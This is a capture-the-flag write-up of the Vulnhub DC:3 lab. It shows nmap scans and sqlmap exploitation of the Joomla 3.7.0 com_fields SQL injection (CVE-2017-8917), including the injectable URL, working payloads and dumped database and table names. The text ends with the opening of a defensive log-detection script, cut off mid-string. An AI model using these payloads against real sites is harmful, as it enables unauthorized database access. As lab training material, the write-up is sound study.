[vulnhub] DC:3


Introduction

The third machine in the Vulnhub DC series. It is mainly about penetrating a Joomla CMS.

Information gathering

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-31 14:52 CST
Nmap scan report for 192.168.56.1
Host is up (0.00021s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00020s latency).
MAC Address: 08:00:27:B1:3D:71 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.111
Host is up (0.00085s latency).
MAC Address: 08:00:27:AC:D4:38 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.144
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 15.94 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.111
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-31 14:52 CST
Nmap scan report for 192.168.56.111
Host is up (0.00037s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:AC:D4:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.91 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p80 192.168.56.111
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-31 14:53 CST
Nmap scan report for 192.168.56.111
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
MAC Address: 08:00:27:AC:D4:38 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.91 seconds

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.111
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-31 14:55 CST
Nmap scan report for 192.168.56.111
Host is up (0.00038s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-vuln-cve2017-8917:
| VULNERABLE:
| Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2017-8917
| Risk factor: High CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
| An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
| to execute aribitrary SQL commands via unspecified vectors.
|
| Disclosure date: 2017-05-17
| Extra information:
| User: root@localhost
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
|_ https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /administrator/: Possible admin folder
| /administrator/index.php: Possible admin folder
| /administrator/manifests/files/joomla.xml: Joomla version 3.7.0
| /language/en-GB/en-GB.xml: Joomla version 3.7.0
| /htaccess.txt: Joomla!
| /README.txt: Interesting, a readme.
| /bin/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /includes/: Potentially interesting folder
| /libraries/: Potentially interesting folder
| /modules/: Potentially interesting folder
| /templates/: Potentially interesting folder
|_ /tmp/: Potentially interesting folder
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.111
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.111:80/
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.56.111:80/index.php/component/users/?view=reset&Itemid=101
| Form id: user-registration
| Form action: /index.php/component/users/?task=reset.request&Itemid=101
|
| Path: http://192.168.56.111:80/index.php/component/users/?view=reset&Itemid=101
| Form id: login-form
| Form action: /index.php/component/users/?Itemid=101
|
| Path: http://192.168.56.111:80/index.php/2-uncategorised/1-welcome
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.56.111:80/index.php/component/users/?view=remind&Itemid=101
| Form id: user-registration
| Form action: /index.php/component/users/?task=remind.remind&Itemid=101
|
| Path: http://192.168.56.111:80/index.php/component/users/?view=remind&Itemid=101
| Form id: login-form
| Form action: /index.php/component/users/?Itemid=101
|
| Path: http://192.168.56.111:80/index.php
| Form id: login-form
|_ Form action: /index.php
MAC Address: 08:00:27:AC:D4:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 321.70 seconds

Only port 80 is open, so there is just one road to walk and we have to follow it to the end.

The upside is that the scan turned up the "Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability", which tells us that port 80 is serving a site built on Joomla and that it has a SQL injection vulnerability.

Web penetration

So let's get straight to it.

SQLMAP

Following the approach from the exploit, try sqlmap first.

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo sqlmap -u "http://192.168.56.111/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
___
__H__
___ ___[(]_____ ___ ___ {1.7.2#stable}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:08:09 /2023-05-31/

[15:08:09] [INFO] fetched random HTTP User-Agent header value 'Opera/9.10 (X11; Linux i386; U; en)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[15:08:10] [INFO] testing connection to the target URL
[15:08:10] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=onljp83m4d8...cvdtmls307'). Do you want to use those [Y/n]
[15:08:16] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:08:16] [INFO] testing if the target URL content is stable
[15:08:16] [INFO] target URL content is stable
[15:08:16] [INFO] heuristic (basic) test shows that GET parameter 'list[fullordering]' might be injectable (possible DBMS: 'MySQL')
[15:08:16] [INFO] testing for SQL injection on GET parameter 'list[fullordering]'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[15:08:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:08:18] [WARNING] reflective value(s) found and filtering out
[15:08:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[15:08:23] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[15:08:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[15:08:27] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[15:08:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[15:08:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[15:08:31] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[15:08:32] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:08:32] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[15:08:32] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[15:08:33] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[15:08:33] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[15:08:33] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[15:08:35] [INFO] testing 'Generic inline queries'
[15:08:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:08:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:08:37] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[15:08:38] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:08:40] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:08:42] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:08:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:08:46] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:08:48] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:08:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:08:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[15:08:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[15:08:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[15:08:52] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[15:08:52] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[15:08:52] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[15:08:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:08:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:08:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:08:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:08:52] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[15:08:53] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[15:08:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:08:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:08:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:08:57] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:08:59] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:09:00] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:09:01] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:09:03] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:09:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:09:06] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:09:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:09:09] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:09:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:09:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:09:13] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:09:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[15:09:16] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[15:09:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:09:17] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[15:09:17] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[15:09:17] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[15:09:17] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[15:09:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:09:17] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:09:17] [INFO] GET parameter 'list[fullordering]' is 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' injectable
[15:09:17] [INFO] testing 'MySQL inline queries'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[15:09:18] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[15:09:18] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[15:09:18] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[15:09:18] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[15:09:18] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[15:09:18] [INFO] testing 'MySQL AND time-based blind (ELT)'
[15:09:18] [INFO] testing 'MySQL OR time-based blind (ELT)'
[15:09:18] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[15:09:18] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[15:09:18] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:09:18] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[15:09:18] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[15:09:29] [INFO] GET parameter 'list[fullordering]' appears to be 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' injectable
[15:09:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:09:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:09:29] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[15:09:30] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:09:30] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[15:09:31] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[15:09:31] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[15:09:32] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[15:09:32] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[15:09:33] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[15:09:33] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[15:09:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:09:34] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[15:09:35] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[15:09:35] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[15:09:36] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[15:09:36] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[15:09:37] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[15:09:38] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[15:09:38] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[15:09:39] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
GET parameter 'list[fullordering]' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2716 HTTP(s) requests:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8824,CONCAT(0x2e,0x717a627071,(SELECT (ELT(8824=8824,1))),0x716a7a6b71),6230))

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8632 FROM (SELECT(SLEEP(5)))WmsI)
---
[15:09:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[15:09:51] [INFO] fetching database names
[15:09:51] [INFO] retrieved: 'information_schema'
[15:09:51] [INFO] retrieved: 'joomladb'
[15:09:51] [INFO] retrieved: 'mysql'
[15:09:51] [INFO] retrieved: 'performance_schema'
[15:09:51] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

[15:09:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2675 times
[15:09:51] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'

[*] ending @ 15:09:51 /2023-05-31/


┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo sqlmap -u "http://192.168.56.111/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --random-agent -D joomladb --tables
___
__H__
___ ___[(]_____ ___ ___ {1.7.2#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:10:42 /2023-05-31/

[15:10:42] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[15:10:42] [INFO] resuming back-end DBMS 'mysql'
[15:10:42] [INFO] testing connection to the target URL
[15:10:42] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=gdur4j5rk68...ce25ghi8c2'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8824,CONCAT(0x2e,0x717a627071,(SELECT (ELT(8824=8824,1))),0x716a7a6b71),6230))

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8632 FROM (SELECT(SLEEP(5)))WmsI)
---
[15:10:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[15:10:44] [INFO] fetching tables for database: 'joomladb'
[15:10:44] [INFO] retrieved: '#__assets'
[15:10:45] [INFO] retrieved: '#__associations'
[15:10:45] [INFO] retrieved: '#__banner_clients'
[15:10:45] [INFO] retrieved: '#__banner_tracks'
[15:10:45] [INFO] retrieved: '#__banners'
[15:10:45] [INFO] retrieved: '#__bsms_admin'
[15:10:45] [INFO] retrieved: '#__bsms_books'
[15:10:45] [INFO] retrieved: '#__bsms_comments'
[15:10:45] [INFO] retrieved: '#__bsms_locations'
[15:10:45] [INFO] retrieved: '#__bsms_mediafiles'
[15:10:45] [INFO] retrieved: '#__bsms_message_typ'
[15:10:45] [INFO] retrieved: '#__bsms_podcast'
[15:10:45] [INFO] retrieved: '#__bsms_series'
[15:10:45] [INFO] retrieved: '#__bsms_servers'
[15:10:45] [INFO] retrieved: '#__bsms_studies'
[15:10:45] [INFO] retrieved: '#__bsms_studytopics'
[15:10:45] [INFO] retrieved: '#__bsms_teachers'
[15:10:45] [INFO] retrieved: '#__bsms_templatecod'
[15:10:45] [INFO] retrieved: '#__bsms_templates'
[15:10:45] [INFO] retrieved: '#__bsms_timeset'
[15:10:45] [INFO] retrieved: '#__bsms_topics'
[15:10:45] [INFO] retrieved: '#__bsms_update'
[15:10:45] [INFO] retrieved: '#__categories'
[15:10:45] [INFO] retrieved: '#__contact_details'
[15:10:45] [INFO] retrieved: '#__content'
[15:10:45] [INFO] retrieved: '#__content_frontpag'
[15:10:45] [INFO] retrieved: '#__content_rating'
[15:10:45] [INFO] retrieved: '#__content_types'
[15:10:45] [INFO] retrieved: '#__contentitem_tag_'
[15:10:45] [INFO] retrieved: '#__core_log_searche'
[15:10:45] [INFO] retrieved: '#__extensions'
[15:10:46] [INFO] retrieved: '#__fields'
[15:10:46] [INFO] retrieved: '#__fields_categorie'
[15:10:46] [INFO] retrieved: '#__fields_groups'
[15:10:46] [INFO] retrieved: '#__fields_values'
[15:10:46] [INFO] retrieved: '#__finder_filters'
[15:10:46] [INFO] retrieved: '#__finder_links'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_links_ter'
[15:10:46] [INFO] retrieved: '#__finder_taxonomy'
[15:10:46] [INFO] retrieved: '#__finder_taxonomy_'
[15:10:46] [INFO] retrieved: '#__finder_terms'
[15:10:46] [INFO] retrieved: '#__finder_terms_com'
[15:10:46] [INFO] retrieved: '#__finder_tokens'
[15:10:46] [INFO] retrieved: '#__finder_tokens_ag'
[15:10:46] [INFO] retrieved: '#__finder_types'
[15:10:46] [INFO] retrieved: '#__jbsbackup_timese'
[15:10:46] [INFO] retrieved: '#__jbspodcast_times'
[15:10:46] [INFO] retrieved: '#__languages'
[15:10:46] [INFO] retrieved: '#__menu'
[15:10:46] [INFO] retrieved: '#__menu_types'
[15:10:47] [INFO] retrieved: '#__messages'
[15:10:47] [INFO] retrieved: '#__messages_cfg'
[15:10:47] [INFO] retrieved: '#__modules'
[15:10:47] [INFO] retrieved: '#__modules_menu'
[15:10:47] [INFO] retrieved: '#__newsfeeds'
[15:10:47] [INFO] retrieved: '#__overrider'
[15:10:47] [INFO] retrieved: '#__postinstall_mess'
[15:10:47] [INFO] retrieved: '#__redirect_links'
[15:10:47] [INFO] retrieved: '#__schemas'
[15:10:47] [INFO] retrieved: '#__session'
[15:10:47] [INFO] retrieved: '#__tags'
[15:10:47] [INFO] retrieved: '#__template_styles'
[15:10:47] [INFO] retrieved: '#__ucm_base'
[15:10:47] [INFO] retrieved: '#__ucm_content'
[15:10:47] [INFO] retrieved: '#__ucm_history'
[15:10:47] [INFO] retrieved: '#__update_sites'
[15:10:47] [INFO] retrieved: '#__update_sites_ext'
[15:10:47] [INFO] retrieved: '#__updates'
[15:10:47] [INFO] retrieved: '#__user_keys'
[15:10:47] [INFO] retrieved: '#__user_notes'
[15:10:47] [INFO] retrieved: '#__user_profiles'
[15:10:47] [INFO] retrieved: '#__user_usergroup_m'
[15:10:47] [INFO] retrieved: '#__usergroups'
[15:10:47] [INFO] retrieved: '#__users'
[15:10:47] [INFO] retrieved: '#__utf8_conversion'
[15:10:47] [INFO] retrieved: '#__viewlevels'
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+

[15:10:47] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 93 times
[15:10:47] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'

[*] ending @ 15:10:47 /2023-05-31/

We can see that the tables in joomladb can be listed.
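Seen from the server side, the sqlmap run above is anything but quiet: a single client sent thousands of requests to index.php?option=com_fields carrying SQL tokens in list[fullordering] and collected HTTP 500 responses for almost all of them. The following is an added example of my own (not code from the write-up, from joomblah or from Joomla) that parses Apache combined-format access log lines and flags exactly that pattern. The log lines are constructed samples with simplified values, and the rule that a legitimate ordering value looks like `a.name ASC` is an assumption based on how Joomla list views format that parameter.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache "combined" format (not taken from any real server).
SAMPLE_LOG = """\
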